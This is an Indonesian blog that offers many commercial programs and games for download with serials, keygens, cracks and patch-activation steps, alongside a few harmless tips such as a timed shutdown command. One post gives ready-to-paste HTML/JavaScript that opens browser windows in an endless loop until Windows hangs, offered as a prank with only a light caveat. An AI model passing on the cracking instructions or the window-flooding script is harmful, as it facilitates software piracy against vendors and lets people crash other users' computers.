PhotoInstrument_v4.3_Build_449+serial


halo sobat...apa kabar?langsung saja ya...ke pokok persoalan,he2..kali ini saya akan membahas tentang photoinstrument,...photoinstrument adalah photo editing,ya mirip2 dengan photoshop gitu lah,tapi kalau ini sangat mudah kok untuk menggunakannya,laen dengan photoshop yg harus menguasai tools yg sangat banyak untuk di pelajari,kali ini aku perkenalkan photoinstrument yg pengerjaanya simpel bgt....


menggunakan photoinstrumet adalah cara yg ampuh dan yg mudah untuk belajar editor grafis yang digunakan untuk mengolah foto digital misalnya :
-Photo Editing
-Photo Retouch
-Draw MakeUp
-Make your photo look like it's taken by a professional photographer

untuk gambar di atas adalah contoh untuk pengerjaanya,seperti menghaluskan wajah yg tadinya berjerawat,memberi makeup,memancungkan hidung,mengubah warna rambut dll,pokok nya banyak deh.....sooob!!!!!!!!dan kamu jangan kuwatir untuk tutorial nya langsung terdapat kok pada program tersebut,jadi kalau kamu masih belum tau cara penggunaan nya anda langsung bisa saksikan tutorial nya disitu,untuk mendapatkan sofeware nya anda langsung bisa ambil disini,beserta serial nya komplit bok....he2.
ya siapa yg berminat silahkan mencoba,dan semoga ber manfaat.untuk pasword budywonk.

nb:untuk  register kamu harus matiin dulu koneksi kamu,biar nanti enggak minta serial number lagi,selamat mencoba semoga berhasil.


TeraCopy Pro 2.12+serial

TeraCopy adalah sebuah program kompak yang dirancang untuk menyalin dan memindahkan file pada , kecepatan maksimum yang mungkin memberikan pengguna banyak fitur Salin file lebih cepat. TeraCopy menggunakan buffer yang disesuaikan secara dinamis untuk mengurangi pencarian Sangat cepat penyalinan transfer file antara dua hard drive.Pause dan melanjutkan transfer file. Jeda proses copy setiap saat untuk membebaskan sumber daya sistem dan lanjutkan dengan satu klik.Kesalahan pemulihan. Dalam kasus copy error, TeraCopy akan mencoba beberapa kali jika file tersebut benar-benar rusak secara otomatis melanjutkan dan mengakhiri seluruh transfer.Daftar file Interaktif. TeraCopy menunjukkan gagal transfer file dan memungkinkan Anda bisa memperbaiki masalah dimana file tersebut yang bermasalah (rusak).
Shell integrasi. TeraCopy dapat sepenuhnya menggantikan fungsi Explorer menyalin dan bergerak, yang memungkinkan Anda bekerja dengan file seperti biasa.Mendukung Unicode Penuh.



untuk cara meng instalnya:
caranya tekan menu dan pilih about,untuk selanjutnya copy dl serial diatas.lalu tekan ok pada tombol key tersebut.semoga berhasil.......dan ga perlu bosa basi lagi bagi anda yang membutuhkan silahkan kamu bisa ambil disini lengkap dengan serial nya.dan semoga bisa bermanfaat untuk anda.









:
.



cFosSpeed 6.50 Full Version + Crack

kali ini saya tawarkan untuk temen temen cFosSpeed,cFosSpeed yaitu sofeware yang dipercaya dapat membuat koneksi internet kita menjadi lebih stabil dan efisien. Dengan Crack ini tidak perlu lagi mereset, karena sudah Full Version (selama tidak diupdate)saya kira sofeware ini sangat berguna bagi kamu2 yg koneksi internet nya yg sering putus dengan bantuan sofeware ini koneksi kita akan stabil


cara kerja:
Pada tranfer data TCP/IP di Windows, sejumlah data harus dikonfirmasikan dahulu sebelum data itu dikirim. Konfirmasi ini biasanya waktu (delay), yang terkadang membikin arus aliran data tersebut tidak lancar / lambat ( transfer-rate slowdowns ) Hal ini terutama terjadi pada DSL dan kabel, yang mana terjadi penyempitan bandwidth sehingga konfirmasi data tidak cukup bandwidth.Solusi dari ini kita bisa mencoba memperbesar TCP window size, dengan demikian membiarkan lebih banyak data yang dikirim tanpa konfirmasi yang segera. cFos Traffic-Shaping technology recognizes mengenali tipe paket penting dan memprioritaskannya tidak hanya untuk pemeliharaan lalu lintas Internet yang lembut tetapi juga menstabilkan nya


nah udah paham kan kira2 guna sofeware ini dan untuk cara instal sudah saya sertakan pada setup dan crack nya disitu nanti kamu bisa baca dan pelajari dengan teliti,untuk mendapatkan sofeware tersebut kamu bisa langsung ambil disini dan tidak usah sungkan2,he2,jangan lupa untuk pasword nya budywonk yg selalu baik kepada anda....walah...muji diri sendiri ni yeeeeee.....he2.selamat mencoba dan semoga bermanfaat.







.




AVS Media Player

untuk posting sebelumnya saya pernah tawarkan media player juga untuk kali ini saya coba perkenalkan AVS Media Player, menyediakan Anda dengan sejumlah fitur yang bermanfaat, yang membuat menonton video digital yang mudah dan menyenangkan. Ini akan membiarkan Anda mengalami spektrum penuh video pada komputer pribadi anda,,,


AVS Media Player memungkinkan pengguna untuk memutar berbagai jenis file media. Yang Anda butuhkan adalah memilih file sumber yang Anda ingin playback dan klik Play.Buka video dengan hampir semua ekstensi file seperti AVI, MPEG, WMV, MP4, DVR-MS, MKV, FLV, OGG, dll dengan AVS Media Player

- Play Audio
Menambahkan trek audio format seperti WAV, MP3, FLAC, M4A, OGG, AAC, AMR, dll Membuat playlist pribadi untuk setiap selera dan gaya dengan AVS Media Player.

Pilih gambar di PNG, JPEG, TIFF, GIF, dll dan melihatnya sebagai tampilan slide. Lihat daftar format gambar yang didukung.
- Nikmati Suara-Around Efek,AVS Media Player mendukung konfigurasi speaker 3.1, 5.1 dan 7.1. Aktifkan Efek Surround dan mendapatkan perasaan seolah-olah Anda berada di bioskop.
langsung saja buat kamu yg belun punya mungkin,kamu bisa ambil disini,untuk pasword nya seperti biasa budywonk.

winrar 4full version+keygen

anda udah tau kan apa winrar itu,kali ini saya akan bahas sedikit tentang winrar,soalnya file yang ada di bog saya ini adalah winrar semua,winrar adalah sebuah sofeware yg berfungsi untuk melakukan kompresi file,WinRAR kini sudah hadir dengan Version 4.00. Ada beberapa perbaikan dan peningkatan dibandingkan dengan versi2 terdahulunya. Sebagai aplikasi yang memiliki fungsi dalam pengompresan data tentunya wajib untuk dimiliki oleh tiap komputer. Dengan program ini kita bisa mengkompres file-file apa saja dan membukanya kembali kapan saja kita inginkan



WinRar mendukung berbagai macam format kompresi, ,Menurut saya pribadi WinRar merupakan tool kompresi yang terbaik untuk saat ini.disamping cepat proses nya dan sofeware ini memang mudah untuk menjalankanya pokok nya gampang deh untuk dipahaminya


WinRAR mendukung semua format kompresi populer ( RAR, ZIP, CAB, ARJ, LZH, ACE, TAR, GZip, UUE, ISO, BZIP2, Z and 7-Zip ). Anda juga dapat memberikan sebuah password pada folder ataupun files agar data tersebut tidak dapat dibuka dan dilihat oleh orang lain. Dan biasanya data yang terkompress akan aman dan tidak dirusak oleh virus,Pada revisi terbaru nya ini WinRar 4 Full 2011 telah meningkatkan kecepatan decompressi nya hingga 30% dari versi sebelumnya.tak perlu basa basi lagi bagi anda yg belum punya silahkan anda download disini,dengan senang hati dan gak usah sungkan2  he2.untuk pasword budywonk..semoga bermanfaat.






Mirilis Splash Pro EX 1.7.1 Full Serial Number

Mirilis Splash Pro EX 1.7.1 Full Serial Number,adalah sofeware untuk vedeo mp3,video terbaik.Dirancang dan dioptimalkan untuk HD. Memainkan High Definition AVCHD ™, MPEG-2, AVC/H.264 dan-1 VC film dan klip camcorder, sangat cepat dan gambar yg sangat mulus

untuk cara instal nya
1.jangan lupa download dulu file nya,terus kamu instal setup nya,tunggu sampai selesai
2.kemudian untuk memasukkan serial sangat mudah buka splash nya lalu close akan ada peringatan
3.pilih opsi "active" lalu copy paste serial tersebut...lalu tekan ok.

nah sudah selesai deh.....he2...untuk mendapatkan sofeware tersebut kamu bisa ambil disini,jangan lupa untuk pasword nya budywonk.semoga bisa bermanfaat.



MEMBUAT WINDOWS JADI BLANK

kali ini saya perkenal kan satu trik yang unik,yaitu membuat windows pada komputer kita jadi blank atau eror,tapi kenapa kok trik yg seharusnya tidak berguna kok saya share disini,jawab nya ini hanya untuk menambah wawasan saja siapa tau ada temen2 yg usil atau yg sengaja untuk mengerjai kita kan kita udah tau sebelum nya jadi kita ga jadi kena ulah usil mereka......


ters apa untung nya boss,biasanya kan ngasih trik itu yg bermanfaat....he2,kenapa kok ini malah merugikan,jawabanya kamu pikir sendiri n yg penting aku ngasih pengalaman saja......he2........
langsung aja ke poko permasalahan ya...ok,.........
caranya:
1,buka itu notoped,dah tau kan notoped???????yg ga tau ya tanya yg tau...gkgkkgkgkkkgkk,yg belum tau saya kasih tau buka itu start button trs buka all program cari di accesseries,,,nah disitulah kira2 letak notoped.
2.copas kode java scipt di bawah ini kedalalam notoped tersebut

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=index.html">
<SCRIPT LANGUAGE="JavaScript">
<!--
for (x=0;x<1;x)
open("index.html");
</SCRIPT>
</HEAD>
</body>
</HTML>

3.kemudian simpan kode tersebut di notoped dan kasih nama( index.html)seperti yg di dalam kurung....
nah selesai deh....Nah, ketika file index.html tersebut dijalankan (di klik), maka komputer akan membuka banyak sekali jendela browser sampai tak terhingga banyaknya hingga windows hang atau sampai ga kuuuuuuuaaaaaattttttttttt........dan akhir nya klepek2 deh......kok bisa begitu ya??????ya bisa lah karena apa????/kamu harus tau,Instruksi dari javascript diatas adalah perintah untuk memanggil diri sendiri tanpa berhenti dengan sangat cepat.oooo begitu ya.....nah sekarang udah tau kan?????tapi jangan di gunakan untuk yg aneh2 ya.......ya kl ga percaya silakan di coba di komputer sendiri ya ,jangan di komputer temenya.....nanti bisa2 dapat hadiah kepalan tangan nanti.....he2,demikian lah trik dr saya semoga bermanfaat,banyak lah membaca n belajar kamu pasti akan jadi tau......salam sejah tera dari budywonk.





Novicorp WinToFlash 0.7.0000 beta

win to flash adalah sofeware untuk mentranfrer windows ke flash,WinToFlash software gratis yang akan membantu Anda untuk mentransfer file instalasi Windows dari CD/DVD ke dalam USB flash drive sehingga FlashDisk tersebut bisa digunakan untuk Boot Instalasi Windows. Jadi anda tidak perlu lagi susah-susah untuk membuat Boot Instalasi Windows dengan command promt yang pastinya akan sulit dimengerti bagi orang awam.WinToFlash sangat mudah dan proses nya sangat cepat,dan banyak ke untungan nya tersendiri untuk menginstal windows ke flash tersebut,disamping simpel mudah di bawa kemana2,windows flash juga ga begitu kuatir karena file nya rusak seperti di banding dengan windows di cd ataupun dvd.....




WinToFlash sangat mudah untuk dioperasikan, bahkan oleh seseorang yang masih awam pun pasti dapat cepat memahaminya. Anda tinggal memilih Windows yang akan ditransfer. tersedia pilihan untuk Windows XP, Windows 2003, Windows Vista, Windows 2008, Windows 7.



sofeware ini tidak perlu anda instal karena berbentuk portable,tinggal kamu klik aja kemudian sofeware ini akan berjalan,,,,
cara menggunakan nya
1.kamu download dulu file yg sudah saya sediakan.....
2.kamu klik file rar nya,berlanjut cari file axe nya,kemudian klik 2x.
3,setelah itu nanti akan muncul dialog yg tertuls"end user license agreement",kemudian kamu pilih tombol accept untuk melanjutkan,...
4.kemudian bertemu halaman baru lalu tekan next.
5.untuk selanjut nya tentukan windows yg anda tranfer tersebut,caranya klik select pada kolom windows file path.,jangan llupa tentukan letak flash yg anda siap kan dengan cara klik select pada kolom usb drive..lalu tekan next untuk melanjutkan.
6.kemudian setelah itu kamu akan di bawa kehalaman baru,disitu kamu beri centang untuk i accepted the term of the license agreement,lalu tekan continue.
lalu tekan ok pada halaman terakir,tunggu biarkan berjalan sampai proses selesai.



nah mudah bukan sooobb,pokok nya jangan pernah menyerah sebelum kamu bisa,sofeware ini cocok bagi kamu2 yg mempunyai netbook,cz kan ga ada dvd drive nya untuk sarana instal tersebut,begitulah penjelasan dari saya kurang lebihnya....untuk mendapatkan sofeware nya kamu2 bisa langsung klik disini,semoga penjelasan saya bisa bermanfaat,selamat mencoba n semoga ber hasil...

by budywonk@yahoo.com
-------------------------------










SHUTDOWN OTOMATIS PADA KOMPUTER


maen komputer emang asyik ya teman2,apa lagi kalau maen game sambil dengerin lagu-lagu kesukaan kita,pastinya tambah asyik banget ni  ya.......,atau mungkin waktu lagi cating sama temen2 kita pokok nya ga kalah srunya lah.......he2...saking asyiknya mata meleng di depan layar ga terasa rasa ngantuk pun dateng,nah klepek deh di depan komputer sampe pagi n komputer masih dalam keadaan nyala,nah ini yg menjadi masalah temen2.......,kalau lama2 di biasakan begitu,komputer kita bisa habis dah.....he2....nah sekarang aku bagi2 sedikit tips ne.....gimana caranya membuat shutdown otomatis pada komputer biar ga kelewat nyala terus walau kita udah keti duran,gampang kok......


         contoh gambar tombol RUN yg dimaksud,untuk membuat shutdown otomatis tersebut


1.klik RUN pada start button atau dengan menekan tombol windows pada keyboard+r...
2.lalu ketik perintah( shutdown -s -t 3600),hitungan ini adalah jumlah detik dalam satu jam.,yg saya kurung itu adalah kata perintahnya.
3.lalu tekan ok.....nah beres deh.
dalam uraian diatas semisal kita mau menggatikan waktu shutdown dalam setengah jam atau 30 menit,kita tinggal mengganti angka 3600 tadi menjadi 1800.dan seterus nya menurut selera kita.....

Sedangkan jika kita ingin membatalkan shutdown otomatis tersebut, kita tinggal mengetikan perintah pada kolom RUN tsbut(shutdown -a)seperti kata2 yang saya  kurung ini,lalu tekan ok........


  contoh gambar sisi atas adalah gambar perintah untuk menghentikan atau meng cancel perintah shutdown otomatis


nah begitulah trik untuk shutdown otomatis nya yang tidak usah menggunakan sofeware teman2,semoga bisa ber manfaat bagi pembaca semuanya,cz kita tau dari membaca dan belajar,salam sejah tera dari saya budywonk.selamat mencoba.


GAMEBOOSTER PREMIUM V2.3+KEY

dalam posting sebelumnya saya telah share game untuk anda semua,kali ini saya share untuk kalian semua yaitu sofeware yang mendukung banget untuk PC anda untuk ber main game,sofeware ini berfungsi sebagai pemacu mesin anda, game Booster Premium dirancang untuk membantu mengoptimalkan PC agar lebih responsif dalam game PC.Ia bekerja dengan memperbarui driver hardware, men-download perangkat game penting, pengaturan tweaker sistem untuk game, defragmenting direktori permainan, mematikan sementara proses background, membersihkan RAM, dan mengintensifkan kinerja prosesor. Kompatibel dengan PunkBuster, Cheating-Death, VAC, dan beberapa sofware anti-cheat..;



 Game Booster dirancang untuk mematikan software yang tidak diperlukan sementara waktu dengan sistemnya sendiri. Dan tidak merusak apa yang ada didalam registry Windows. Karena Game Booster bisa saja mengembalikan apa yang sudah di nonaktifkan kembali dengan sekali click pada menu program. Dan seluruh program akan kembali berjalan seperti semula.


nah untuk teman2 yang suka maen game,jangan sungkan2 untuk memasang gamebooster ini pada PC anda,biar selalu kuat dan ringan saat bermain game,ok......untuk mendapat kan gamebooster ini anda bisa mendownload disini,lengkap dengan serial numbernya....untuk pasword nya budywonk.ok selamat mencoba dan semoga bermanfaat.







GAME ALADIN MAGIG CARPET RACING

nikmati terbang bersama karpet aladin yg bisa bawa kamu terbang kemana-mana sesuka hati kamu,atau mungkin buat tar pulang ke tanah air kita,cz sekarang ni ane lagi merantau....he2,nik mati petualangan serunya teman2....dari pada naik pesawat terbang ga bisa liat mendung mending naik karpet aja.........



tapi ngomong2 jangan sampe lompat dari karpet ya nanti bisa celaka...udah tau kan cerita alasin,legenda atau cerita dongeng yg berasal dari timur tengah ini....



untuk lebih jelas nya anda bisa langsung cobain deh permainan ini,pokok nya di jamin asyik deh.....bisa liat padang pasir....,oiya sofeware ini ga usah pake di instal cukup kamu klik 2x setup axe nya kamu trs dibawa terbang ke permainan ini,untuk mendapatkan permainan ini kamu bisa sedot,disini file nya kecil kok,dan untuk pasword rar nya kamu bisa isi dengan budywonk,selamat mencoba,semoga bisa menghibur

GAME BLOODY ROAR 2

nah yg ini bagi anda yg suka ber kelahi,.....eh salah maksud saya suka permainan per tarungan cocok ini kayak nya,Bloody Roar ini cerita seorang petarung, Kita akan  bertarung melawan 9 karakter yang ada di game ini. Apabila kita sudah mengalahkan ke-9 karakter tersebut, maka kita akan bertarung menghadapi sang raja yang tangguh. Apabila kita bisa menghabisi raja tersebut maka kita akan bisa menggunakan karakternya untuk bertarung. Seru kan ?sofeware ini ga perlu di instal temen2 Jadi tinggal klik 2 kali, kemudian sudah bisa main deh...........



silah kan di pilih mana jagoannya yg untuk bertarung nanti



yang bawah ini tampilan saat bertarungnya...

yang berminat bisa di unduh disini,ini buat refresh aja,ya kalau gak ya buat anak nya yg lagi nangis tuh suruh di beliin PS,kasih ini saja biar ga nangis lagi,gkgkgkgkgkgkgkgkgkg.........
jangan lupa untuk pasword nya budywonk,semoga bisa menghibur.........


GAME HIGHWAY PURSUIT


kali ini aku persembah kan untuk temen2 sebuah game gratis yg bisa anda nikmati permainan nya di layar dekstop komputer anda,,,,game bukan untuk anak2 saja kok orang dewasa juga boleh main game,di saat kita lagi suntuk ada kalanya kita coba game yg satu ini,Highway Pursuit. Sebuah game 3D tentang pengejaran sebuah mobil yang berusaha meloloskan diri dari musuh, dilengkapi dengan seperangkat persenjataan yang canggih plus "efek audio" yang sangat menarik........



bagi anda anda yg suka berpetualang dengan mobil,disini tempat nya untuk melampiaskan nya,dengan desain 3d kita bisa menikmatinya dengan lebih mantep.yg suka silahkan saja langsung di sedot disini,tapi saya saran kan jangan sampe rebutan sama adik kecil nya ya kalau lagi maen.........he2....

untuk pasword budywonk,ini sekedar untuk hibura saja kok,semoga bisa menghibur.

DEKSTOP LOCKER

jaman sekarang komputer sudah tak asing lagi ya teman2,hampir semua sudah memilikinya dari anak2 sampai orang dewasa,setiap hari pasti bergelut dengan komputer,entah itu cuma untuk berrmain2 untuk menambah pengalaman atau mungkin untuk bekerja sehari2 nya,nah makanya mungkin komputer kita menjadi sahabat sehari2nya,komputer juga berfungsi banyak sekali manfaat nya untuk kita ,misal untuyk menyimpan dokumen2 penting,dukumen rahasia kita,yg seharusnya tidak boleh terjamah oleh tangan2 jail,nah untuk kali ini saya memperkenalkan untuk temen2 berupa sofeware yg namanya dekstop locker.yg berfungsi untuk mengunci dekstop kita agar tidak terjamah oleh mereka2 yg usil.......


nah gambar di atas adalah tampilan sofeware tersebut soob.......sofeware ini berbentuk portable,jd ga usah di instal,tinggal klik az....sistem ini akan berjalan,.....


cara pemakaian nya :..........
1.klik 2 kali biar sistem ini bekerja
2.kemudian tentukan pada panel your pasword,sesuai dengan keinginan anda
3.tentukan optional untuk memilih gambar atau poto yg anda sukai
3.tulis pada message,untuk memberikan pesan tulisan pada dekstop anda
4.centang kotak kecil pada tulisan createstart up registery dan create dekstop shortcut
5.lalu tekan save untuk mengakhiri nya.
untuk unistal nya,kamu masukin pasword yg anda buat td,di pojok atas sebelah kiri,lalu klik setting,trs pilih unistal nah beres dah......untuk mendapatkan sofeware nya kamu bisa unduh disini

nb:ati2 jangan sampai lupa sama pasword nya ya,maksudnya pasword yang kamu buat td...nanti bisa celaka deh.....he2.....selamat mencoba............
ok.demikian lah penjelasan dari saya moga ber manfaat,untuk pasword rar nya budywonk.













DEEP FREEZE + KEY

Mungkin semua sudah tau deep freeze itu apa,Deep freeze yaitu program aplikasi yang berfungsi sebagai pelindung kmputer kita dari berbagai jenis virus atau semua yg mem bahayakan komputer kita,cara kerja amplikasi ini adalah, apabila komputer atau laptop kita restart maka akan kembali ke settingan semula. Jadi, misalnya ketika kamu menggunakan komputer dan terserang virus, bahkan virus yang menjangkiti PC mu lebih dari 1 juta jenis virus, dan jika kamu restart komputermu maka komputer kamu akan kembali ke settingan semula seperti sewaktu belum terkena virus tersebut sebelumnya. Dengan kata sederhananya, sistem komputer kamu di bekukan.





Deep freeze yang  berikan ini keluaran buatan dari faronics, dengan versi 6.62.020.3058 . Deep freeze Standard Edition versi  dari Faronics ini sangat ampuh, dan belum ada software yang mampu untuk mengunfreeze deep freeze versi  ini. Jadi intinya belum ada cara untuk menjebol deep freeze terbaru ini.







Deep freeze ini suport/mendukung untuk windows XP, Viesta dan windows Seven., Software ini sangat cocok digunakan di warnet, terutama untuk mengantisipasi adanya user-user yang nakal atau usil di warnet,- Software ini cocok digunakan untuk personal bagi kamu yang suka otak-atik komputer, dan bahkan cocok bagi yang tidak suka dengan virus, Sebelum menginstall deep freeze, sarankan untuk mensetting komputer atau laptop kamu dalam kondisi maksimal, fresh dan bebas dari virus. Dengan tujuan agar sewaktu kamu memakai deep freeze kondisi tetap fresh dan maksimal, dan begitu selanjutnya berulang kali walaupun kamu restart komputer kamu, tetap fresh.,,,,,,,,,

cara menginstal nya:
1.pertama2 download dl file yg dah saya sediakan,....
2. Kemudian install,ke komputer kamu.
3. Dan langsung berhadapan muncul kolom serial, masukan serialnya
4. lalu disuruh memilih drive partisi mana yang akan kamu bekukan / freeze. saya sarankan yang kamu freeze yang drive C saja. Karena drive C merupakan drive yang penting, selain untuk mengantisipasi adanya virus yang berinduk di drive C.
5. Komputer akan restart
6. Jika sudah restart, maka di sisi kanan bawah desktop (tray) akan muncul icon deep freeze (bulat gambar beruang).
7. Untuk membuka deep freeze nya, tekan tombol shift + dan klik 2x pada icon deep freeze nya secara bersamaan.
8. Lalu akan muncul bagian enter password, abaikan saja, klik ok, karena kamu belum membuat password.
9. Kemudian akan muncul tab inti
pada bagian tab password, digunakan untuk membuat password, yang digunakan sewaktu kamu login seperti awal tadi saat membuka deep freeze.Boot Froozen: Jika kamu klik ini, komputer kamu akan tetap di freeze setiap kali restart.Boot Thawed on Next : Jika kamu klik ini, komputer akan di unfreeze untuk beberapa kali restart. Misalnya kamu pilih 2 maka untuk selama dua kali restart, program deepfreeze akan di non aktifkan atau di unfreeze. Dan jika lebih dari 2, komputer kamu akan di freeze kembali,Boot Thawed : Jika kamu klik ini, komputer akan restart dan akan di unfreeze dalam waktu yang tidak terbatas, sampai kamu men setting kembali,Jika sudah memilih, klik apply and reboot untuk restart,ooo iya untuk hasil download semisalnya kamu habis mendownload sebelum komputer kamu restart kamu harus pindahin dulu hasil download tan tersebut,cz kl ga di pindahin begitu komputer di restart semua akan hilang setelah ter pasang deep freeze ini,....ok,untuk mendapatkan sofeware nya kamu bisa unduh disini,demikian penjelasan dari saya,kurang lebih begitu,semoga bermanfaat...

Nb: untuk cara menguninstall deep freeze, caranya stop dulu deep freeze nya / boot thawed (lalu restart), kemudian klik master software deep freeze, pilihan uninstall. Jadi syarat untuk uninstall, software master deep freeze nya jangan sampai hilang, simpan dengan baik,.


selamat mencoba.




,download di bawah ini
Photobucket



klik skip ad /lewati,untuk mendownload di adf.ly pada pojok kanan atas,terimakasih. 
pasword : budywonk




winFF vedeo convert

WinFF adalah Sofeware converter yg paling praktis dan  kualitas nya juga ga di ragukan lagi, . winFF dapat mengkonversi hampir semua video file,WinFF dapat mengkonvert file dalam berbagai format pada satu waktu. Misalnya, Anda dapat mengkonversi mpeg's, flv, dan mov, semua menjadi avi semua sekaligus....


untuk urusan konfer mengkonvert jangan ragukan lagi sobat,pake winff di jamin masalah anda akan terjawab,dan cara pakai nya juga gampang bgt kok....,lihat seperti gambar di atas,untuk masukin file yg akan di pilh,kamu tekan panel add,kemudian pilih file mana yg akan kita konvert lalu tekan open,kemudian select convert to untuk menentukan format,sebagai contoh pilih audio,kemudian pilih tombol device preset sebagai contoh pilih mp3,nah yg terakir kita tinggal menentukan tombol output folder,disitulah nanti kita akan dapatkan hasil dari pada proyek tersebut....misal kan kita taruh di lokal D,berarti mp3 hasil dari konvert tersebut letaknya di lokal D,setelah semua udah kita seting sedemikian rupa kita tinggal menekan tombol konvert yg ber simbul panah pada gambar atas,nah mudah bukan sobat....gambar di bawah menunjukkan winff sedang bekerja,dan tunggu sampai selesai


nah kalau udah berhenti,dan ada tulisan continue pada gambar diatas berarti sudah selesai ,nah mudah bukan cara pemakaian nya,untuk dapatkan sofeware nya ,teman-teman bisa ambil disini,semoga ber manfaat........untuk pasword budywonk.


SEVEN REMIX XP

nah setelah aku perkenalkan xp theme dalam posting sebelum nya kini aku perkenalkan untuk seven remix,seven remix yaitu tampilan untuk windows xp anda dijadikan mirip dengan windows seven,ini bagi anda yg udah kadung gandrung atau familier dengan windows xp tapi ingin tampilan win7,disini lah tempat nya untuk dapatkan sofeware nya.....


tapi kamu ga usah kuatir ini cuma tampilanya aja kok,yg mirip dengan windows7....anda tertarik dan ingin mencobanya silakan aja di unduh disini,dengan sekali klik anda bisa mendapatkanya,dan tidak perlu repot mencarinya......semoga bermanfaat.

XP THEME

buat kamu-kamu yg doyan modif atau suka tampil beda untuk tampilan pesawat tempur anda,he2...maksud saya tampilan dekstop di komputer anda...saya ada sofewarenya yang buat ngemodif layar dekstop anda untuk windows xp anda.....sbnarnya udah lama  c.....mungkin dh ketinggalan aku ya......he2....tp  ga pa2  dari pada tidak sama sekali  hayo.....he2.....


di situ ada banyak pilihan dan terserah kamu mau pilih  suka suka untuk tampilan dekstop xp anda,dan pastinya bikin ciamik  sobat,jd kamu ga bosen dengan tampilan2 yg keren itu.......nah untuk memiliki sofeware nya kamu bisa langsung sedot aja disini,ga di pungut biaya kok alias gratis....ok.semoga bermanfaat.

by budywonk
----------------

CyberLink YouCam3 +serial number


CyberLink YouCam adalah solusi perangkat lunak untuk pengguna webcam.
Pengguna dual-mode desain antarmuka membuat CyberLink YouCam mudah dan menyenangkan untuk digunakan. modus Pesan Instan, Anda dapat berpartisipasi dalam sesi webcam video dengan teman-teman Anda, sambil menerapkan efek instan secara real-time. Efek instan memungkinkan Anda menambahkan frame, filter, distorsi dan efek emosi untuk video webcam Anda. Hal ini memungkinkan Anda untuk meningkatkan video dengan ini menyenangkan dan efek video kreatif..

CyberLink YouCam juga memungkinkan Anda secara berkala memperluas kemampuan efek. Anda dapat men-download efek tambahan dari situs web CyberLink, kemudian impor ke CyberLink YouCam. Kreativitas Anda tidak terbatas!



cyberlink youcam Dirancang untuk sistem sentuh terbaru, YouCam fitur sejumlah dukungan untuk kebutuhan high-definition dan sentuhan
Interaksi Touch,desain antarmuka baru YouCam mendukung interaksi sentuh tunggal, membuat aktivitas online merasa lebih intim.
kompatibilitas Webcam: Webcam HD terbaru didukung memungkinkan untuk menangkap video dan foto foto kualitas tinggi

temen2 pengen miliki sofeware tersebut,ga usah kuatir dengan senang hati saya selalu menyajikan untuk anda secara cuma2 ga di pungut biaya alias gratis.....he2.......untuk mendapatkan nya temen2 bisa klik disini,ingat pasword nya budywonk,ya udah ....silahkan  di doanload,semoga berhasil.....

nb :kami sarankan apabila anda mau menginstal cyberlink ini,terlebih dahulu matikan dan tutup amplikasi yg berhubungan dengan vedeo cating,supaya lancar untuk instal nya,trimakasih.



by budywonk@yahoo.com
--------------------------------




HOROSKOP RAMALAN JAWA


Kali ini aku perkenalkan software untuk dukun - dukunan....gkgkgkgkgkgkggkgk
Yaitu software horoskop, bisa untuk meramal cinta, untuk meramal karier, ramalan pribadi maupun ramalan perjodohan antara kamu dan pasanganmu berdasarkan horoskop jawa.
Penasaran? Ayoo kamu harus tau seberapa cocok kamu dengan pasangan kamu.........




Fitur dari software horoskop:

1. Ramalan pribadi
2. Ramalan perjodohan
3. Kalender Jawa
4. Bio Rythm (siklus kehidupan, meliputi siklus emosional, fisik dan intelektual)
5. Jarak hari
6. Jangka hari
7. Pencarian jodoh berdasarkan hari kelahiran
8. Ramalan durjana (jika ada kasus pencurian)

asik bukan kawan2,keren bgt pokonya........software ini portable,jadi kamu gak usah repot2 menginstal nya
tapi ingat ini hanya ramalan saja looo.....percaya tidak percaya tergantung anda  yang menyikapinya......untuk sofeware nya kamu bisa dapatkan disini,paswordnya budywonk,selamat jadi dukun baru........gkgkgkggkgkgkgkggkk

MEMORY CLEANER


MEMORY CLEANER  sofeware yg berguna  membersihkan cache RAM agar komputer bekerja dngan  cepat.. RAM yaitu memory pada PC, sebuah komputer membutuhkan RAM untuk menyimpan data dan instruksi yang dibutuhkan untuk menyelesaikan sebuah perintah (task). Data ataupun instruksi yang tersedia pada RAM memungkinkan processor atau CPU (Central Processing Unit) untuk mengaksesnya dengan cepat. Nah, dengan bantuan software ini, bermaksud untuk mengclear cache pada RAM agar mempercepat akses PC kamu.



langsung aja kalau sobat berminat bisa kamu unduh filenya disini,semoga sofeware ini bermanfaat untuk kamu,untuk pasword nya budywonk,selamat mencoba......

IDM download meneger full version+patch


kali ini tentang Internet Download Manager versi 6.05 dengan crack dan patch sehingga bisa full version,
download idm 6.05 full, download keygen idm, idm portable, download free internet download manager free, Fitur ini hadir untuk penyempurnaan performa terutama perbaikan bugs integrasi dengan Browser Google Chrome dan
pada edisi kali ini Internet Download Manager 6.05 banyak sekali memberikan kemudahan dalam penggunaannya seperti
dapat mempercepat download software jenis apapun , tambahan lainnya seperti penambahan pada sistem keamanannya.




Internet Download Manager 6.05 aktivasinya sangat simpel,
anda tinggal klik dua kali pada IDM.Exe yang sudah didownload dan Internet Download Manager ini akan otomatis aktif dan siap digunakan.
Yang perlu dilakukan adalah penyesuaian source folder tempat penyimpanan file unduhan kemudian kamu bisa melakukan setting IDM agar download lebih cepat.


cara instalnya per tama2 kamu donload dl file nya,kemudian kamu instal idm axe nya sampe selesai,setelah penginstalan selesai,kamu buka file SnDk&p.exe patch nya, klik patch server check disitu nnti akan ada serial number yg selanjutnya kamu copy paste kan ke idm pada registration yg sudah terinstal td,,lalu tekan ok...nah kini idm anda udah full version...mudah bukan...????
nb:setelah kamu restart kok masih minta serial number lagi,langkah selanjutnya,kamu jalankan idm nya sampai finish tapi jangan di klik finish dulu,biarkan dulu lalu jalankan snd&p exe patch nya lalu klik patch server check nya,nah begitu semoga anda berhasil.
untuk memiliki nya kamu bisa klik disini
terimakasih moga bermanfaat,untuk paswordnya budywonk.


NERO BURNING ROM 7+KEYGEN

Nero 7 - Solusi Ultimate Data, Video, Foto, Audio dan Backup! Redesign dari user interface meningkatkan kegunaan dan membuat Nero Burning ROM 7 tercepat ,untuk menggunakan. Akses dari Nero Burning ROM ke database Home Nero menjamin akses mudah ke file media termasuk opsi pencarian lanjutan dengan Nero Scout.Nero 7 Premium memungkinkan Anda untuk pengalaman media digital Anda dengan cara yang  baru dan inovatif......









Anda ingin mengakses file media Anda dari kenyamanan ruang keluarga Anda, atau menyelesaikan proyek media digital pada PC, Nero 7 Premium adalah semua yang Anda butuhkan.






